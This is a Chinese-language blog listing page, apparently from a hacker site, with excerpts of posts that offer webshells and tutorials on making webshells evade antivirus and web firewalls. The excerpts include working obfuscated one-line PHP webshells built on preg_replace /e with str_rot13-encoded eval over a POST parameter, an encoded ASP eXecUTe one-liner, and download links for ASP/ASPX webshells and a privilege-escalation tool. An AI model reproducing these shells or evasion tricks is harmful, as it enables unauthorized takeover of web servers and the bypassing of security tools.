会飞的鱼

2018-10-30admins 阅读(473)评论(0)

登录界面提权下面在发一个黑色的登录界面提权下载地址：https://www.lanzous.com/i28shpa

2018-10-30admins 阅读(783)评论(0)

Silic Webshell V5.6 使用手册Silic Group Hacker Army后门管理程序欢迎使用Silic Group Hacker Army开发的Web安全测试程序本程序基于php开发和运行，代码行数2210 lines, 程序大小135KB(占用空间136KB)，本程序未加密，无后门。请将本脚本置于支持php的目录并访问运行，默认密码为...

2019-5-16admins 阅读(21)评论(0)

本文首发于圈子 大家好我是辣鸡404 本文马儿几乎都免杀且用且珍惜0x01 前言尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧0x02 目录关于eval 于 assert字符串变形定义函数绕过回调函数回调函数变形特殊字符干扰数组类编码绕过无字符特征马PHP7.1后webshell何去何从总结0x03 关于eval 于 assert关于eval...

2019-5-16admins 阅读(31)评论(0)

0x00 前言现在asp不多但是还是有，还是写一篇文章来简单的介绍下asp的免杀吧，相对于php我们的asp还是不够灵活。0x01 目录数组函数加密注释符类字符串操作0x02 了解asp一句话ASP解释器还有：VBScriptASP的注释符号 ： ' 、 REM 当然如果你使用vbscript 注释还有<!-- --> 和//...

2019-5-6admins 阅读(92)评论(0)

发现有些思路很好的webshell已经被特征了稍微改改就好了asp过狗一句话↓原马儿 <%<!--"--> eXecUTe(fun("%167%184%163%174%98%180%167%179%183%167%181%182%106%100%142%163%176%166%137%180%167%187%100%107")...

2019-2-1admins 阅读(224)评论(0)

AspxSpy2014受bin牛委托修改并发布，版权归bin牛所有。免责声明：本程序只用于管理员安全检测，使用前请注意环境与法律法规，因使用不当造成的后果本人不承担任何责任。 已测试的系统：Markupwin2003+iis6+.net 2.0 win2008+iis7+.net 4.0 win8+iis8+.net 4.5注意：此版本最低需要...

2018-11-16admins 阅读(505)评论(0)

<?php ($sun = $_POST['caidaome']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($sun)', 'add');?>好吧 应网友需求，刚去做了个过d盾的，其他的没测试<?php$a = chr(92+5);$b = chr(ord($a)+1...

2018-11-16admins 阅读(600)评论(0)

开始原谅我见识短,没用过usort函数上面连接的文章中,发现有这个函数于是刚刚了解了下usort函数 usort函数干嘛的?官方介绍:http://php.net/manual/zh/function.usort.php通俗点说就是一个稍微复杂点的数组,如果用php自带的函数不是很方便所以用户可以自己定义一个函数,然后使用usort函数来进行回调&...

2018-11-9admins 阅读(501)评论(0)

不灭之魂2018改进版本asp大马①在原版不灭之魂隐藏防删的基础上加上了炼魂大法，让不灭之魂永久不灭②继续集成了原版的所有提权功能③依旧霸气十足，炫酷十足，黑阔必备④去除原版后门，后门详情官网已披露，在此不必细说，原版后门(wz=ShellUrl收信)登录页面调用密码⑤修复了部分功能和去除无用功能,修复了登录页面爆密码还有参数爆密码漏洞登录界面如下：功能界面...

2018-11-9admins 阅读(396)评论(0)

土司搞基Asp大马,程序为C.S.G内部群某大牛发出,估计该位大牛也是T00ls内部的人员,界面十分精美解决了很多在火狐下排版错位的问题登录界面如下：功能界面：下载地址：https://www.lanzous.com/i2b5cid